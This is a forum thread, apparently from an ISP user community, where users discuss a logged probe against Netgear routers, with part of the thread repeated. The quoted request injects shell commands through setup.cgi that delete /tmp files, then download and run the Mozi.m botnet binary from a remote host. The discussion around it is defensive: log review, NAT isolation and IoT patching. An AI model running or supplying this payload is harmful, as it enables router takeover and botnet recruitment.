What do you think this does:GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+htp://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 Chinese have been hitting this kind of heavily... (grunged http to htp to prevent creating an ebedded link)

It possibly does a bad thing...

Anything that has a web-based admin/configuration that can be done remotely (i.e., outside of the LAN) is technically vulnerable, and almost all of these devices are no matter how current the firmware is. The fact that we're behind a double-NAT on this network isolates us a lot from those trying to probe via IPv4, which is the most common. Most of my morning routine is going through an access log subset that includes just direct-IP probes, login attempts (and there are a lot of those), and the full set of webDAV (port 81) attempts. Why webDAV is even allowed these days is beyond me. In fact there's a bunch of apps out there with embedded malware that just probe webDAV access in various forms. I've not seen any IPv6 probing on a large scale, because of the resources required to scan the full range of IPv6 IPs, but I suppose that's coming at some point.

Sure do.Hackers can find a vulnerability in IoT devices faster than manufacturers can:1. Detect it's there,2. Fix it,3. Post an update,4. And most of all, have an end user actually update the device/install it. The alternative to an addressable IoT box is to have an off-device cloud intermediary (which is better for us behind the double-NAT, btw) - depending upon how secure that cloud is kept. My Carrier thermostat is like that. However, most of the ones I see are complete disasters from a security aspect, including AmazonAWS, Google, and Microsoft. The ones hackers love are the ones like AmazonAWS that use dynamic IP addressing because they're hard to block.

My question is, because I'm not really well versed in all of this stuff, what it is they're doing. Are they trying to take control of the router? Make it be a kind of bot? Is it just simple hacking to get to personal info, or is it something more nefarious?

Forum Discussion

MarkJFine

Professor

5 years ago

NetGear users...

What do you think this does:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+htp://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

Chinese have been hitting this kind of heavily... (grunged http to htp to prevent creating an ebedded link)

general discussion is not a support area

maratsade
Distinguished Professor IV
5 years ago
It possibly does a bad thing...
- MarkJFine
  Professor
  5 years ago
  I'd bet on it.
  - maratsade
    Distinguished Professor IV
    5 years ago
    My question is, because I'm not really well versed in all of this stuff, what it is they're doing. Are they trying to take control of the router? Make it be a kind of bot? Is it just simple hacking to get to personal info, or is it something more nefarious?
GabeU
Distinguished Professor IV
5 years ago
Glad I'm not using mine right now.

Forum Discussion

NetGear users...

Related Content

Connecting Netgear modem and router.

Netgear Genie question

HT2000w Modem-uSERS 'GUIDE

A Netgear router and 3rd party DNS..

Just to double check adding another user?

Recent Discussions

Very, very poor support

Hughesnet is a total rip-off

Anybody want some snow?

Blocking phone numbers and other divices

Very poor internet service